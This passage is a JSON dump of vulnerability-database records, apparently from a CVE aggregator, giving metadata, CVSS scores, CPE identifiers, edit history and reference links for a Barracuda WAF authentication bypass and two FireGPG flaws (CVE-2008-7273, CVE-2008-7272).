"584cd9e6927eaaa814c6545414f09911"}, {"key": "extraReferences", "hash": "073d5951cb97bd54baf9ef00e5950ef4"}, {"key": "href", "hash": "756bd44ad36e62b951b7a08611cbd3f5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "92ee34fefd5301ff6ccb77b813c8d4f8"}, {"key": "published", "hash": "6c607768196e3786ab17cb3a6e516cad"}, {"key": "references", "hash": "cf46dbeffc0c7dc51130bcd388b4459a"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "bc7f8fc71017e1124d57947313af5643"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "scheme": null, "affectedSoftware": [{"cpeName": "barracuda:web_application_firewall", "name": "barracuda web application firewall", "operator": "eq", "version": "7.8.1.013"}], "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cwe": ["CWE-613"], "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "http://packetstormsecurity.com/files/127740/Barracuda-WAF-Authentication-Bypass.html"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31004"}, {"name": "http://www.osvdb.org/109782", "refsource": "MISC", "tags": ["Broken Link"], "url": "http://www.osvdb.org/109782"}, {"name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/", "refsource": "MISC", "tags": ["Broken Link"], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2595/"}, {"name": "https://www.exploit-db.com/exploits/39278", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/39278"}, {"name": "https://www.securityfocus.com/bid/69028", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.securityfocus.com/bid/69028"}, {"name": "http://seclists.org/fulldisclosure/2014/Aug/5", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "http://seclists.org/fulldisclosure/2014/Aug/5"}], "immutableFields": []}, {"id": "CVE-2008-7273", "bulletinFamily": "NVD", "title": "CVE-2008-7273", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "published": "2019-11-18T22:15:00", "modified": "2019-11-20T15:56:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "cvelist": ["CVE-2008-7273"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedSoftware": [{"name": "getfiregpg iceweasel-firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:iceweasel-firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-12-18T13:57:06", "references": [], "rev": 2}, "score": {"modified": "2019-12-18T13:57:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "d61e8c253c1f5d35ed5977532afcfe58d323a03057be4323e8c19bd7bed39d26", "hashmap": [{"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3e1e24cf5fed13b85f5534cb239a1044", "key": "cpe"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4464888dd8ea79b7344278e86594f061", "key": "affectedSoftware"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2019-12-18T13:57:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2019-12-18T13:57:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "557fd4cb813bf4897b5fdca93f953d2fe22dd9fed46f9a924ed2d03719983a4f", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-09-21T13:59:22", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 62}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "enchantments": {"dependencies": {"modified": "2020-12-09T19:28:28", "references": [], "rev": 2}, "score": {"modified": "2020-12-09T19:28:28", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [], "hash": "3f2537e658f4240fe6f7df8e451ce685d2ca8ba79fbda529c1842e690c507e37", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-12-09T19:28:28", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 76}, "differentElements": ["extraReferences"], "edition": 7, "lastseen": "2020-12-09T19:28:28"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T11:51:06", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T11:51:06", "rev": 2, "value": 1.2, "vector": "NONE"}}, "hash": "3f49259ae0555553bcbf3433a53f5984d6de287f6d865e78b449bda3b88b8ea7", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "lastseen": "2020-10-03T11:51:06", "modified": "2019-11-20T15:56:00", "objectVersion": "1.3", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 72}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-10-03T11:51:06"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7273"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 85, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}, {"id": "CVE-2008-7272", "bulletinFamily": "NVD", "title": "CVE-2008-7272", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "published": "2019-11-08T00:15:00", "modified": "2020-02-10T21:16:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "reporter": "cve@mitre.org", 